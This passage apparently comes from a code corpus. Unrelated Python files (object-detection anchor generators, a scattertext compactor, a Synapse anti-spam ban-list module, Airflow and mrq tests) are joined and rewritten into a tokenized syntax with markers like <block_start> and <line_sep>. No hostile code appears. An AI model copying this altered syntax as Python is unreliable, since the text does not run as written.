dim=0)<block_end><return>anchors_with_stride<block_end><class_stmt>AnchorGenerator2D(torch.nn.Module)<block_start><def_stmt>__init__ self sizes:Sequence[Union[int Sequence[int]]]=(128 256 512) aspect_ratios:Sequence[Union[float Sequence[float]]]=(0.5 1.0 2.0) **kwargs<block_start>""" Generator for anchors Modified from https://github.com/pytorch/vision/blob/master/torchvision/models/detection/rpn.py Args: sizes (Sequence[Union[int, Sequence[int]]]): anchor sizes for each feature map (length should match the number of feature maps) aspect_ratios (Sequence[Union[float, Sequence[float]]]): anchor aspect ratios: height/width, e.g. (0.5, 1, 2). if Seq[Seq] is provided, it should have the same length as sizes """<line_sep>super().__init__()<if_stmt><not>isinstance(sizes[0] (list tuple))<block_start>sizes=tuple((s )<for>s sizes)<block_end><if_stmt><not>isinstance(aspect_ratios[0] (list tuple))<block_start>aspect_ratios=(aspect_ratios )<times>len(sizes)<block_end><assert_stmt>len(sizes)<eq>len(aspect_ratios)<line_sep>self.sizes=sizes<line_sep>self.aspect_ratios=aspect_ratios<line_sep>self.cell_anchors=<none><line_sep>self._cache={}<line_sep>self.num_anchors_per_level:List[int]=<none><if_stmt>kwargs<block_start>logger.info(f"Discarding anchor generator kwargs {kwargs}")<block_end><block_end><def_stmt>cached_grid_anchors self grid_sizes:List[List[int]] strides:List[List[int]]<arrow>List[torch.Tensor]<block_start>""" Check if combination was already generated before and return that if possible Args: grid_sizes (Sequence[Sequence[int]]): spatial sizes of feature maps strides (Sequence[Sequence[int]]): stride of each feature map Returns: List[torch.Tensor]: Anchors for each feature maps """<line_sep>key=str(grid_sizes+strides)<if_stmt>key<not><in>self._cache<block_start>self._cache[key]=self.grid_anchors(grid_sizes strides)<block_end>self.num_anchors_per_level=self._cache[key][1]<line_sep><return>self._cache[key][0]<block_end><def_stmt>grid_anchors self grid_sizes strides<arrow>Tuple[List[torch.Tensor] List[int]]<block_start>""" Distribute anchors over feature maps Args: grid_sizes (Sequence[Sequence[int]]): spatial sizes of feature maps strides (Sequence[Sequence[int]]): stride of each feature map Returns: List[torch.Tensor]: Anchors for each feature maps List[int]: number of anchors per level """<assert_stmt>len(grid_sizes)<eq>len(strides) "Every fm size needs strides"<assert_stmt>len(grid_sizes)<eq>len(self.cell_anchors) "Every fm size needs cell anchors"<line_sep>anchors=[]<line_sep>cell_anchors=self.cell_anchors<assert_stmt>cell_anchors<is><not><none><line_sep>_i=0<line_sep># modified from torchvision (ordering of axis differs) anchor_per_level=[]<for_stmt>size,stride,base_anchors zip(grid_sizes strides cell_anchors)<block_start>size0,size1=size<line_sep>stride0,stride1=stride<line_sep>device=base_anchors.device<line_sep>shifts_x=torch.arange(0 size0 dtype=torch.float device=device)<times>stride0<line_sep>shifts_y=torch.arange(0 size1 dtype=torch.float device=device)<times>stride1<line_sep>shift_y,shift_x=torch.meshgrid(shifts_y shifts_x)<line_sep>shift_x=shift_x.reshape(-1)<line_sep>shift_y=shift_y.reshape(-1)<line_sep>shifts=torch.stack((shift_x shift_y shift_x shift_y) dim=1)<line_sep>_anchors=(shifts.view(-1 1 4)+base_anchors.view(1 -1 4)).reshape(-1 4)<line_sep>anchors.append(_anchors)<line_sep>anchor_per_level.append(_anchors.shape[0])<line_sep>logger.debug(f"Generated {anchors[_i].shape[0]} anchors and expected "<concat>f"{size0<times>size1<times>self.num_anchors_per_location()[_i]} "<concat>f"anchors on level {_i}.")<line_sep>_i<augadd>1<block_end><return>anchors anchor_per_level<block_end>@staticmethod<def_stmt>generate_anchors scales:Tuple[int] aspect_ratios:Tuple[float] dtype:torch.dtype=torch.float device:Union[torch.device str]="cpu" <arrow>torch.Tensor<block_start>""" Generate anchors for a pair of scales and ratios Args: scales (Tuple[int]): scales of anchors, e.g. (32, 64, 128) aspect_ratios (Tuple[float]): aspect ratios of height/width, e.g. (0.5, 1, 2) dtype (torch.dtype): data type of anchors device (Union[torch.device, str]): target device of anchors Returns: Tensor: anchors of shape [n(scales) * n(ratios), dim * 2] """<line_sep>scales=torch.as_tensor(scales dtype=dtype device=device)<line_sep>aspect_ratios=torch.as_tensor(aspect_ratios dtype=dtype device=device)<line_sep>h_ratios=torch.sqrt(aspect_ratios)<line_sep>w_ratios=1/h_ratios<line_sep>ws=(w_ratios[: <none>]<times>scales[<none> :]).view(-1)<line_sep>hs=(h_ratios[: <none>]<times>scales[<none> :]).view(-1)<line_sep>base_anchors=torch.stack([-ws -hs ws hs] dim=1)/2<line_sep><return>base_anchors.round()<block_end><def_stmt>set_cell_anchors self dtype:torch.dtype device:Union[torch.device str]="cpu"<arrow><none><block_start>""" Set :para:`self.cell_anchors` if it was not already set Args: dtype (torch.dtype): data type of anchors device (Union[torch.device, str]): target device of anchors Returns: None result is saved into attribute """<if_stmt>self.cell_anchors<is><not><none><block_start><return><block_end>cell_anchors=[self.generate_anchors(sizes aspect_ratios dtype device)<for>sizes,aspect_ratios zip(self.sizes self.aspect_ratios)]<line_sep>self.cell_anchors=cell_anchors<block_end><def_stmt>forward self image_list:torch.Tensor feature_maps:List[torch.Tensor]<arrow>List[torch.Tensor]<block_start>""" Generate anchors for given feature maps # TODO: update docstring and type Args: image_list (torch.Tensor): data structure which contains images and their original shapes feature_maps (Sequence[torch.Tensor]): feature maps for which anchors need to be generated Returns: List[Tensor]: list of anchors (for each image inside the batch) """<line_sep>device=image_list.device<line_sep>grid_sizes=list([feature_map.shape[2:]<for>feature_map feature_maps])<line_sep>image_size=image_list.shape[2:]<line_sep>strides=[list((int(i/s)<for>i,s zip(image_size fm_size)))<for>fm_size grid_sizes]<line_sep>self.set_cell_anchors(dtype=feature_maps[0].dtype device=feature_maps[0].device)<line_sep>anchors_over_all_feature_maps=self.cached_grid_anchors(grid_sizes strides)<line_sep>anchors=[]<line_sep>images_shapes=[img.shape<for>img image_list.split(1)]<for_stmt>i,x enumerate(images_shapes)<block_start>anchors_in_image=[]<for_stmt>anchors_per_feature_map anchors_over_all_feature_maps<block_start>anchors_in_image.append(anchors_per_feature_map)<block_end>anchors.append(anchors_in_image)<block_end>anchors=[torch.cat(anchors_per_image).to(device)<for>anchors_per_image anchors]<line_sep># TODO: check with torchvision if this makes sense (if enabled, anchors are newly generated for each run) # # Clear the cache in case that memory leaks. # self._cache.clear() <return>anchors<block_end><def_stmt>num_anchors_per_location self<arrow>List[int]<block_start>""" Number of anchors per resolution Returns: List[int]: number of anchors per positions for each resolution """<line_sep><return>[len(s)<times>len(a)<for>s,a zip(self.sizes self.aspect_ratios)]<block_end><def_stmt>get_num_acnhors_per_level self<arrow>List[int]<block_start>""" Number of anchors per resolution Returns: List[int]: number of anchors per positions for each resolution """<if_stmt>self.num_anchors_per_level<is><none><block_start><raise>RuntimeError("Need to forward features maps before "<concat>"get_num_acnhors_per_level can be called")<block_end><return>self.num_anchors_per_level<block_end><block_end><class_stmt>AnchorGenerator3D(AnchorGenerator2D)<block_start><def_stmt>__init__ self sizes:Sequence[Union[int Sequence[int]]]=(128 256 512) aspect_ratios:Sequence[Union[float Sequence[float]]]=(0.5 1.0 2.0) zsizes:Sequence[Union[int Sequence[int]]]=(4 4 4) **kwargs<block_start>""" Helper to generate anchors for different input sizes Args: sizes (Sequence[Union[int, Sequence[int]]]): anchor sizes for each feature map (length should match the number of feature maps) aspect_ratios (Sequence[Union[float, Sequence[float]]]): anchor aspect ratios: height/width, e.g. (0.5, 1, 2). if Seq[Seq] is provided, it should have the same length as sizes zsizes (Sequence[Union[int, Sequence[int]]]): sizes along z dimension """<line_sep>super().__init__(sizes aspect_ratios)<if_stmt><not>isinstance(zsizes[0] (Sequence list tuple))<block_start>zsizes=(zsizes )<times>len(sizes)<block_end>self.zsizes=zsizes<if_stmt>kwargs<block_start>logger.info(f"Discarding anchor generator kwargs {kwargs}")<block_end><block_end><def_stmt>set_cell_anchors self dtype:torch.dtype device:Union[torch.device str]="cpu"<arrow><none><block_start>""" Compute anchors for all pairs of sclaes and ratios and save them inside :param:`cell_anchors` if they were not computed before Args: dtype (torch.dtype): data type of anchors device (Union[torch.device, str]): target device of anchors Returns: None (result is saved into :param:`self.cell_anchors`) """<if_stmt>self.cell_anchors<is><not><none><block_start><return><block_end>cell_anchors=[self.generate_anchors(sizes aspect_ratios zsizes dtype device)<for>sizes,aspect_ratios,zsizes zip(self.sizes self.aspect_ratios self.zsizes)]<line_sep>self.cell_anchors=cell_anchors<block_end>@staticmethod<def_stmt>generate_anchors scales:Tuple[int] aspect_ratios:Tuple[float] zsizes:Tuple[int] dtype:torch.dtype=torch.float device:Union[torch.device str]="cpu"<arrow>torch.Tensor<block_start>""" Generate anchors for a pair of scales and ratios Args: scales (Tuple[int]): scales of anchors, e.g. (32, 64, 128) aspect_ratios (Tuple[float]): aspect ratios of height/width, e.g. (0.5, 1, 2) zsizes (Tuple[int]): scale along z dimension dtype (torch.dtype): data type of anchors device (Union[torch.device, str]): target device of anchors Returns: Tensor: anchors of shape [n(scales) * n(ratios) * n(zscales) , dim * 2] """<line_sep>base_anchors_2d=AnchorGenerator2D.generate_anchors(scales aspect_ratios dtype=dtype device=device)<line_sep>zanchors=torch.cat([torch.as_tensor([-z z] dtype=dtype device=device).repeat(base_anchors_2d.shape[0] 1)<for>z zsizes] dim=0)<line_sep>base_anchors_3d=torch.cat([base_anchors_2d.repeat(len(zsizes) 1) (zanchors/2.).round()] dim=1)<line_sep><return>base_anchors_3d<block_end><def_stmt>grid_anchors self grid_sizes:Sequence[Sequence[int]] strides:Sequence[Sequence[int]]<arrow>Tuple[List[torch.Tensor] List[int]]<block_start>""" Distribute anchors over feature maps Args: grid_sizes (Sequence[Sequence[int]]): spatial sizes of feature maps strides (Sequence[Sequence[int]]): stride of each feature map Returns: List[torch.Tensor]: Anchors for each feature maps List[int]: number of anchors per level """<assert_stmt>len(grid_sizes)<eq>len(strides)<assert_stmt>len(grid_sizes)<eq>len(self.cell_anchors)<line_sep>anchors=[]<line_sep>_i=0<line_sep>anchor_per_level=[]<for_stmt>size,stride,base_anchors zip(grid_sizes strides self.cell_anchors)<block_start>size0,size1,size2=size<line_sep>stride0,stride1,stride2=stride<line_sep>dtype,device=base_anchors.dtype base_anchors.device<line_sep>shifts_x=torch.arange(0 size0 dtype=dtype device=device)<times>stride0<line_sep>shifts_y=torch.arange(0 size1 dtype=dtype device=device)<times>stride1<line_sep>shifts_z=torch.arange(0 size2 dtype=dtype device=device)<times>stride2<line_sep>shift_x,shift_y,shift_z=torch.meshgrid(shifts_x shifts_y shifts_z)<line_sep>shift_x=shift_x.reshape(-1)<line_sep>shift_y=shift_y.reshape(-1)<line_sep>shift_z=shift_z.reshape(-1)<line_sep>shifts=torch.stack((shift_x shift_y shift_x shift_y shift_z shift_z) dim=1)<line_sep>_anchors=(shifts.view(-1 1 6)+base_anchors.view(1 -1 6)).reshape(-1 6)<line_sep>anchors.append(_anchors)<line_sep>anchor_per_level.append(_anchors.shape[0])<line_sep>logger.debug(f"Generated {_anchors.shape[0]} anchors and expected "<concat>f"{size0<times>size1<times>size2<times>self.num_anchors_per_location()[_i]} "<concat>f"anchors on level {_i}.")<line_sep>_i<augadd>1<block_end><return>anchors anchor_per_level<block_end><def_stmt>num_anchors_per_location self<arrow>List[int]<block_start>""" Number of anchors per resolution Returns: List[int]: number of anchors per positions for each resolution """<line_sep><return>[len(s)<times>len(a)<times>len(z)<for>s,a,z zip(self.sizes self.aspect_ratios self.zsizes)]<block_end><block_end><class_stmt>AnchorGenerator2DS(AnchorGenerator2D)<block_start><def_stmt>__init__ self width:Sequence[Union[int Sequence[int]]] height:Sequence[Union[int Sequence[int]]] **kwargs <block_start>""" Helper to generate anchors for different input sizes Uses a different parametrization of anchors (if Sequence[int] is provided it is interpreted as one value per feature map size) Args: width: sizes along width dimension height: sizes along height dimension """<line_sep># TODO: check width and height statements super().__init__()<if_stmt><not>isinstance(width[0] Sequence)<block_start>width=[(w )<for>w width]<block_end><if_stmt><not>isinstance(height[0] Sequence)<block_start>height=[(h )<for>h height]<block_end>self.width=width<line_sep>self.height=height<assert_stmt>len(self.width)<eq>len(self.height)<if_stmt>kwargs<block_start>logger.info(f"Discarding anchor generator kwargs {kwargs}")<block_end><block_end><def_stmt>set_cell_anchors self dtype:torch.dtype device:Union[torch.device str]="cpu"<arrow><none><block_start>""" Compute anchors for all pairs of sclaes and ratios and save them inside :param:`cell_anchors` if they were not computed before Args: dtype (torch.dtype): data type of anchors device (Union[torch.device, str]): target device of anchors Returns: None (result is saved into :param:`self.cell_anchors`) """<if_stmt>self.cell_anchors<is><not><none><block_start><return><block_end>cell_anchors=[self.generate_anchors(w h dtype device)<for>w,h zip(self.width self.height)]<line_sep>self.cell_anchors=cell_anchors<block_end>@staticmethod<def_stmt>generate_anchors width:Tuple[int] height:Tuple[int] dtype:torch.dtype=torch.float device:Union[torch.device str]="cpu" <arrow>torch.Tensor<block_start>""" Generate anchors for given width, height and depth sizes Args: width: sizes along width dimension height: sizes along height dimension Returns: Tensor: anchors of shape [n(width) * n(height), dim * 2] """<line_sep>all_sizes=torch.tensor(list(product(width height)) dtype=dtype device=device)/2<line_sep>anchors=torch.stack([-all_sizes[: 0] -all_sizes[: 1] all_sizes[: 0] all_sizes[: 1]] dim=1)<line_sep><return>anchors<block_end><def_stmt>num_anchors_per_location self<arrow>List[int]<block_start>""" Number of anchors per resolution Returns: List[int]: number of anchors per positions for each resolution """<line_sep><return>[len(w)<times>len(h)<for>w,h zip(self.width self.height)]<block_end><block_end><class_stmt>AnchorGenerator3DS(AnchorGenerator3D)<block_start><def_stmt>__init__ self width:Sequence[Union[int Sequence[int]]] height:Sequence[Union[int Sequence[int]]] depth:Sequence[Union[int Sequence[int]]] **kwargs <block_start>""" Helper to generate anchors for different input sizes Uses a different parametrization of anchors (if Sequence[int] is provided it is interpreted as one value per feature map size) Args: width: sizes along width dimension height: sizes along height dimension depth: sizes along depth dimension """<line_sep># TODO: check width and height statements super().__init__()<if_stmt><not>isinstance(width[0] Sequence)<block_start>width=[(w )<for>w width]<block_end><if_stmt><not>isinstance(height[0] Sequence)<block_start>height=[(h )<for>h height]<block_end><if_stmt><not>isinstance(depth[0] Sequence)<block_start>depth=[(d )<for>d depth]<block_end>self.width=width<line_sep>self.height=height<line_sep>self.depth=depth<assert_stmt>len(self.width)<eq>len(self.height)<eq>len(self.depth)<if_stmt>kwargs<block_start>logger.info(f"Discarding anchor generator kwargs {kwargs}")<block_end><block_end><def_stmt>set_cell_anchors self dtype:torch.dtype device:Union[torch.device str]="cpu"<arrow><none><block_start>""" Compute anchors for all pairs of scales and ratios and save them inside :param:`cell_anchors` if they were not computed before Args: dtype (torch.dtype): data type of anchors device (Union[torch.device, str]): target device of anchors Returns: None (result is saved into :param:`self.cell_anchors`) """<if_stmt>self.cell_anchors<is><not><none><block_start><return><block_end>cell_anchors=[self.generate_anchors(w h d dtype device)<for>w,h,d zip(self.width self.height self.depth)]<line_sep>self.cell_anchors=cell_anchors<block_end>@staticmethod<def_stmt>generate_anchors width:Tuple[int] height:Tuple[int] depth:Tuple[int] dtype:torch.dtype=torch.float device:Union[torch.device str]="cpu"<arrow>torch.Tensor<block_start>""" Generate anchors for given width, height and depth sizes Args: width: sizes along width dimension height: sizes along height dimension depth: sizes along depth dimension Returns: Tensor: anchors of shape [n(width) * n(height) * n(depth) , dim * 2] """<line_sep>all_sizes=torch.tensor(list(product(width height depth)) dtype=dtype device=device)/2<line_sep>anchors=torch.stack([-all_sizes[: 0] -all_sizes[: 1] all_sizes[: 0] all_sizes[: 1] -all_sizes[: 2] all_sizes[: 2]] dim=1)<line_sep><return>anchors<block_end><def_stmt>num_anchors_per_location self<arrow>List[int]<block_start>""" Number of anchors per resolution Returns: List[int]: number of anchors per positions for each resolution """<line_sep><return>[len(w)<times>len(h)<times>len(d)<for>w,h,d zip(self.width self.height self.depth)]<block_end><block_end>
<import_stmt>numpy<as>np<import_from_stmt>scattertext.termranking AbsoluteFrequencyRanker<class_stmt>ClassPercentageCompactor(object)<block_start><def_stmt>__init__ self term_ranker=AbsoluteFrequencyRanker term_count=2<block_start>''' Limit terms to ones that make up a minimum percentage of documents in a category. Given a term_count, set the threshold to that of the smallest class. Parameters ---------- term_ranker : TermRanker term_count : int '''<line_sep>self.term_ranker=term_ranker<line_sep>self.term_count=term_count<block_end><def_stmt>compact self term_doc_matrix non_text=<false><block_start>''' Parameters ------- term_doc_matrix : TermDocMatrix non_text : bool Returnss ------- New term doc matrix '''<line_sep>ranker=self.term_ranker(term_doc_matrix)<if_stmt>non_text<block_start>ranker=ranker.use_non_text_features()<block_end>tdf=ranker.get_ranks()<line_sep>tdf_sum=tdf.sum(axis=0)<line_sep>tdf_portions=tdf/tdf_sum<line_sep>threshold=np.max(self.term_count/tdf_sum)<line_sep>terms_to_remove=tdf_portions[~(tdf_portions<g>threshold).any(axis=1)].index<line_sep><return>term_doc_matrix.remove_terms(terms_to_remove non_text=non_text)<block_end><block_end>
# -*- coding: utf-8 -*- # Copyright 2019 The Matrix.org Foundation C.I.C. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>logging<import_from_stmt>.list_rule ALL_RULE_TYPES RECOMMENDATION_BAN<import_from_stmt>.ban_list BanList<import_from_stmt>synapse.types UserID<line_sep>logger=logging.getLogger("synapse.contrib."+__name__)<class_stmt>AntiSpam(object)<block_start><def_stmt>__init__ self config api<block_start>self.block_invites=config.get("block_invites" <true>)<line_sep>self.block_messages=config.get("block_messages" <false>)<line_sep>self.block_usernames=config.get("block_usernames" <false>)<line_sep>self.list_room_ids=config.get("ban_lists" [])<line_sep>self.rooms_to_lists={}# type: Dict[str, BanList] self.api=api<line_sep># Now we build the ban lists so we can match them self.build_lists()<block_end><def_stmt>build_lists self<block_start><for_stmt>room_id self.list_room_ids<block_start>self.build_list(room_id)<block_end><block_end><def_stmt>build_list self room_id<block_start>logger.info("Rebuilding ban list for %s"%(room_id))<line_sep>self.get_list_for_room(room_id).build()<block_end><def_stmt>get_list_for_room self room_id<block_start><if_stmt>room_id<not><in>self.rooms_to_lists<block_start>self.rooms_to_lists[room_id]=BanList(api=self.api room_id=room_id)<block_end><return>self.rooms_to_lists[room_id]<block_end><def_stmt>is_user_banned self user_id<block_start><for_stmt>room_id self.rooms_to_lists<block_start>ban_list=self.rooms_to_lists[room_id]<for_stmt>rule ban_list.user_rules<block_start><if_stmt>rule.matches(user_id)<block_start><return>rule.action<eq>RECOMMENDATION_BAN<block_end><block_end><block_end><return><false><block_end><def_stmt>is_room_banned self invite_room_id<block_start><for_stmt>room_id self.rooms_to_lists<block_start>ban_list=self.rooms_to_lists[room_id]<for_stmt>rule ban_list.room_rules<block_start><if_stmt>rule.matches(invite_room_id)<block_start><return>rule.action<eq>RECOMMENDATION_BAN<block_end><block_end><block_end><return><false><block_end><def_stmt>is_server_banned self server_name<block_start><for_stmt>room_id self.rooms_to_lists<block_start>ban_list=self.rooms_to_lists[room_id]<for_stmt>rule ban_list.server_rules<block_start><if_stmt>rule.matches(server_name)<block_start><return>rule.action<eq>RECOMMENDATION_BAN<block_end><block_end><block_end><return><false><block_end># --- spam checker interface below here --- <def_stmt>check_event_for_spam self event<block_start>room_id=event.get("room_id" "")<line_sep>event_type=event.get("type" "")<line_sep>state_key=event.get("state_key" <none>)<line_sep># Rebuild the rules if there's an event for our ban lists <if_stmt>state_key<is><not><none><and>event_type<in>ALL_RULE_TYPES<and>room_id<in>self.list_room_ids<block_start>logger.info("Received ban list event - updating list")<line_sep>self.get_list_for_room(room_id).build(with_event=event)<line_sep><return><false><block_end># Ban list updates aren't spam <if_stmt><not>self.block_messages<block_start><return><false><block_end># not spam (we aren't blocking messages) sender=UserID.from_string(event.get("sender" ""))<if_stmt>self.is_user_banned(sender.to_string())<block_start><return><true><block_end><if_stmt>self.is_server_banned(sender.domain)<block_start><return><true><block_end><return><false><block_end># not spam (as far as we're concerned) <def_stmt>user_may_invite self inviter_user_id invitee_user_id room_id<block_start><if_stmt><not>self.block_invites<block_start><return><true><block_end># allowed (we aren't blocking invites) sender=UserID.from_string(inviter_user_id)<if_stmt>self.is_user_banned(sender.to_string())<block_start><return><false><block_end><if_stmt>self.is_room_banned(room_id)<block_start><return><false><block_end><if_stmt>self.is_server_banned(sender.domain)<block_start><return><false><block_end><return><true><block_end># allowed (as far as we're concerned) <def_stmt>check_username_for_spam self user_profile<block_start><if_stmt><not>self.block_usernames<block_start><return><true><block_end># allowed (we aren't blocking based on usernames) # Check whether the user ID or display name matches any of the banned # patterns. <return>self.is_user_banned(user_profile["user_id"])<or>self.is_user_banned(user_profile["display_name"])<block_end><def_stmt>user_may_create_room self user_id<block_start><return><true><block_end># allowed <def_stmt>user_may_create_room_alias self user_id room_alias<block_start><return><true><block_end># allowed <def_stmt>user_may_publish_room self user_id room_id<block_start><return><true><block_end># allowed @staticmethod<def_stmt>parse_config config<block_start><return>config<block_end><block_end># no parsing needed
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. <import_stmt>logging<import_stmt>pytest<import_from_stmt>airflow.config_templates.airflow_local_settings DEFAULT_LOGGING_CONFIG<import_from_stmt>airflow.models DAG TaskInstance<import_from_stmt>airflow.operators.empty EmptyOperator<import_from_stmt>airflow.utils.log.logging_mixin set_context<import_from_stmt>airflow.utils.state DagRunState<import_from_stmt>airflow.utils.timezone datetime<import_from_stmt>airflow.utils.types DagRunType<import_from_stmt>tests.test_utils.config conf_vars<import_from_stmt>tests.test_utils.db clear_db_runs<line_sep>DEFAULT_DATE=datetime(2019 1 1)<line_sep>TASK_HANDLER='task'<line_sep>TASK_HANDLER_CLASS='airflow.utils.log.task_handler_with_custom_formatter.TaskHandlerWithCustomFormatter'<line_sep>PREV_TASK_HANDLER=DEFAULT_LOGGING_CONFIG['handlers']['task']<line_sep>DAG_ID="task_handler_with_custom_formatter_dag"<line_sep>TASK_ID="task_handler_with_custom_formatter_task"<line_sep>@pytest.fixture(scope="module" autouse=<true>)<def_stmt>custom_task_log_handler_config <block_start>DEFAULT_LOGGING_CONFIG['handlers']['task']={'class':TASK_HANDLER_CLASS 'formatter':'airflow' 'stream':'sys.stdout' }<line_sep>logging.config.dictConfig(DEFAULT_LOGGING_CONFIG)<line_sep>logging.root.disabled=<false><line_sep><yield><line_sep>DEFAULT_LOGGING_CONFIG['handlers']['task']=PREV_TASK_HANDLER<line_sep>logging.config.dictConfig(DEFAULT_LOGGING_CONFIG)<block_end>@pytest.fixture()<def_stmt>task_instance <block_start>dag=DAG(DAG_ID start_date=DEFAULT_DATE)<line_sep>task=EmptyOperator(task_id=TASK_ID dag=dag)<line_sep>dagrun=dag.create_dagrun(DagRunState.RUNNING execution_date=DEFAULT_DATE run_type=DagRunType.MANUAL)<line_sep>ti=TaskInstance(task=task run_id=dagrun.run_id)<line_sep>ti.log.disabled=<false><line_sep><yield>ti<line_sep>clear_db_runs()<block_end><def_stmt>assert_prefix task_instance:TaskInstance prefix:str<arrow><none><block_start>handler=next((h<for>h task_instance.log.handlers<if>h.name<eq>TASK_HANDLER) <none>)<assert_stmt>handler<is><not><none> "custom task log handler not set up correctly"<assert_stmt>handler.formatter<is><not><none> "custom task log formatter not set up correctly"<line_sep>expected_format=f"{prefix}:{handler.formatter._fmt}"<line_sep>set_context(task_instance.log task_instance)<assert_stmt>expected_format<eq>handler.formatter._fmt<block_end><def_stmt>test_custom_formatter_default_format task_instance<block_start>"""The default format provides no prefix."""<line_sep>assert_prefix(task_instance "")<block_end>@conf_vars({("logging" "task_log_prefix_template"):"{{ti.dag_id }}-{{ ti.task_id }}"})<def_stmt>test_custom_formatter_custom_format_not_affected_by_config task_instance<block_start>assert_prefix(task_instance f"{DAG_ID}-{TASK_ID}")<block_end>
<import_from_stmt>mrq.job Job<import_stmt>datetime<import_from_stmt>mrq.queue Queue<import_stmt>time<import_stmt>pytest<line_sep>@pytest.mark.parametrize(["p_queue" "p_pushback" "p_timed" "p_flags"] [["test_timed_set" <false> <true> "--greenlets 10"] ["pushback_timed_set" <true> <true> "--greenlets 10"] ["test_sorted_set" <false> <false> "--greenlets 1"]])<def_stmt>test_raw_sorted worker p_queue p_pushback p_timed p_flags<block_start>worker.start(flags="%s --config tests/fixtures/config-raw1.py"%p_flags queues=p_queue)<line_sep>test_collection=worker.mongodb_logs.tests_inserts<line_sep>jobs_collection=worker.mongodb_jobs.mrq_jobs<line_sep>current_time=int(time.time())<assert_stmt>jobs_collection.count()<eq>0<assert_stmt>Queue(p_queue).size()<eq>0<line_sep># Schedule one in the past, one in the future worker.send_raw_tasks(p_queue {"aaa":current_time-10 "bbb":current_time+5 "ccc":current_time+10} block=<false>)<line_sep># Re-schedule worker.send_raw_tasks(p_queue {"ccc":current_time+6} block=<false>)<line_sep>time.sleep(3)<if_stmt><not>p_timed<block_start><assert_stmt>Queue(p_queue).size()<eq>0<assert_stmt>test_collection.count()<eq>3<assert_stmt>list(test_collection.find(projection={"params":1 "_id":0}).limit(1))<eq>[{"params":{"sorted_set":"aaa"}}]<line_sep><return><block_end><if_stmt>p_pushback<block_start><assert_stmt>Queue(p_queue).size()<eq>3<assert_stmt>set(Queue(p_queue).list_raw_jobs())<eq>set([b"bbb" b"ccc" b"aaa"])<block_end><else_stmt><block_start><assert_stmt>Queue(p_queue).size()<eq>2<assert_stmt>set(Queue(p_queue).list_raw_jobs())<eq>set([b"bbb" b"ccc"])<block_end># The second one should not yet even exist in mrq_jobs <assert_stmt>jobs_collection.count()<eq>1<assert_stmt>list(jobs_collection.find())[0]["status"]<eq>"success"<assert_stmt>list(test_collection.find(projection={"params":1 "_id":0}))<eq>[{"params":{"timed_set":"aaa"}}]<line_sep># Then wait for the second job to be done time.sleep(5)<if_stmt>p_pushback<block_start><assert_stmt>Queue(p_queue).size()<eq>3<block_end><else_stmt><block_start><assert_stmt>Queue(p_queue).size()<eq>0<block_end><assert_stmt>jobs_collection.count()<eq>3<assert_stmt>list(jobs_collection.find())[1]["status"]<eq>"success"<assert_stmt>list(jobs_collection.find())[2]["status"]<eq>"success"<assert_stmt>list(jobs_collection.find())[2]["worker"]<assert_stmt>test_collection.count()<eq>3<block_end>@pytest.mark.parametrize("has_subqueue" [<false> <true>])@pytest.mark.parametrize(["p_queue" "p_set"] [["test_raw" <false>] ["test_set" <true>]])<def_stmt>test_raw_set worker has_subqueue p_queue p_set<block_start>flags="--greenlets 10 --config tests/fixtures/config-raw1.py"<if_stmt>has_subqueue<block_start>flags="%s --subqueues_refresh_interval=0.1"%flags<line_sep># worker should dequeue all subqueues p_queue="%s/"%p_queue<block_end>worker.start(flags=flags queues=p_queue)<if_stmt>has_subqueue# queue tasks in p_queue/subqueue <block_start>p_queue="%ssubqueue"%p_queue<block_end>test_collection=worker.mongodb_logs.tests_inserts<line_sep>jobs_collection=worker.mongodb_jobs.mrq_jobs<assert_stmt>jobs_collection.count()<eq>0<assert_stmt>Queue(p_queue).size()<eq>0<line_sep>worker.send_raw_tasks(p_queue ["aaa" "bbb" "ccc" "bbb"] block=<true>)<assert_stmt>Queue(p_queue).size()<eq>0<if_stmt>p_set<block_start><assert_stmt>jobs_collection.count()<eq>3<assert_stmt>jobs_collection.count({"status":"success"})<eq>3<assert_stmt>test_collection.count()<eq>3<block_end><else_stmt><block_start><assert_stmt>jobs_collection.count()<eq>4<assert_stmt>jobs_collection.count({"status":"success"})<eq>4<assert_stmt>test_collection.count()<eq>4<block_end><block_end><def_stmt>test_raw_started worker<block_start>worker.start(flags="--greenlets 2 --config tests/fixtures/config-raw1.py" queues="teststarted_raw teststartedx")<line_sep>worker.send_raw_tasks("teststarted_raw" ["f1" "f2" "f3"] block=<false>)<line_sep>time.sleep(2)<line_sep>jobs_collection=worker.mongodb_jobs.mrq_jobs<assert_stmt>jobs_collection.find({"status":"started" "queue":"teststartedx"}).count()<eq>2<assert_stmt>jobs_collection.count()<eq>2<line_sep>worker.mongodb_jobs.tests_flags.insert({"flag":"f1"})<line_sep>time.sleep(1)<assert_stmt>jobs_collection.find({"status":"success" "queue":"teststartedx"}).count()<eq>1<assert_stmt>jobs_collection.find({"status":"started" "queue":"teststartedx"}).count()<eq>2<assert_stmt>jobs_collection.count()<eq>3<line_sep>worker.mongodb_jobs.tests_flags.insert({"flag":"f2"})<line_sep>worker.mongodb_jobs.tests_flags.insert({"flag":"f3"})<line_sep>time.sleep(1)<line_sep>worker.stop(block=<true> deps=<false>)<assert_stmt>jobs_collection.find({"status":"success" "queue":"teststartedx"}).count()<eq>3<assert_stmt>jobs_collection.count()<eq>3<line_sep>worker.stop_deps()<block_end>@pytest.mark.parametrize(["p_queue"] [["test_raw"] ["test_set"] ["test_timed_set"]])<def_stmt>test_raw_remove worker p_queue<block_start>worker.start_deps()<line_sep>worker.send_raw_tasks(p_queue ["aa" "bb" "cc"] block=<false> start=<false>)<assert_stmt>Queue(p_queue).size()<eq>3<line_sep>Queue(p_queue).remove_raw_jobs(["aa" 